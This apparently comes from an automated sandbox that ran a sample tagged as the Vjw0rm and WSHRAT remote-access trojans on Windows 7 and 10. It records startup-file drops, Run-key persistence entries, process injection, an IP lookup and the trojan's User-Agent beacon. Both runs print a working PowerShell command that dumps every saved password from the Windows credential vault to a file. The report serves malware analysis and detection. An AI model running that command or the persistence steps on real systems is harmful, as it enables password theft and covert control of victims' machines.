Malware Analysis Report

2025-01-18 12:21

Sample ID 221109-sp6wxahhc4
Target 879-5160.rar
SHA256 2bcd0ec21bad7f6955cad32f1f5403f07553796d4489feb1a3f3338549e161f0
Tags vjw0rm wshrat persistence trojan worm
Score 10/10

Analysis Overview

Threat Level: Known bad

The file 879-5160.rar was found to be: Known bad.

Malicious Activity Summary

vjw0rm wshrat persistence trojan worm

Vjw0rm

WSHRAT

Blocklisted process makes network request

Checks computer location settings

Drops startup file

Adds Run key to start application

Looks up external IP address via web service

Drops file in Program Files directory

Enumerates physical storage devices

Script User-Agent

Suspicious use of WriteProcessMemory

Modifies registry class

Analysis: static1

Detonation Overview

Reported 2022-11-09 15:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2022-11-09 15:19
Reported 2022-11-09 15:21
Platform win7-20220901-en
Max time kernel 114s
Max time network 152s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\879-5160.js

Signatures

Vjw0rm

trojan worm vjw0rm

WSHRAT

trojan wshrat

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBWjfUFDNu.js C:\Windows\System32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBWjfUFDNu.js C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\879-5160.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\879-5160.js C:\Windows\system32\wscript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\879-5160 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\879-5160.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\879-5160 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\879-5160.js\"" C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Java\jre7\food.jar C:\Program Files\Java\jre7\bin\javaw.exe N/A

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|94A7BB46|RYNKSFQE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\879-5160.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\VBWjfUFDNu.js"

C:\Program Files\Java\jre7\bin\javaw.exe

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\food.jar"

C:\Program Files\Java\jre7\bin\java.exe

"C:\Program Files\Java\jre7\bin\java.exe" -jar "C:\Program Files\Java\jre7\food.jar"

C:\Program Files\Java\jre7\bin\java.exe

"C:\Program Files\Java\jre7\bin\java.exe" -jar "C:\Users\Admin\food.jar"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

Analysis: behavioral2

Detonation Overview

Submitted 2022-11-09 15:19
Reported 2022-11-09 15:22
Platform win10v2004-20220901-en
Max time kernel 127s
Max time network 154s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\879-5160.js

Signatures

Vjw0rm

trojan worm vjw0rm

WSHRAT

trojan wshrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBWjfUFDNu.js C:\Windows\System32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBWjfUFDNu.js C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\879-5160.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\879-5160.js C:\Windows\system32\wscript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\879-5160 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\879-5160.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\879-5160 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\879-5160.js\"" C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\jvm.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\dll\jvm.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\jvm.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\dll\ntdll.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\symbols\dll\ntdll.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\symbols\dll\jvm.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\dll\jvm.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\symbols\dll\jvm.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\ntdll.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\symbols\dll\ntdll.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\ntdll.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\dll\ntdll.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings C:\Windows\system32\wscript.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|36F4858E|IYMUGYHL|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4996 wrote to memory of 3124 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 4996 wrote to memory of 5040 N/A C:\Windows\system32\wscript.exe C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\879-5160.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\VBWjfUFDNu.js"

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\food.jar"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"

C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe

C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
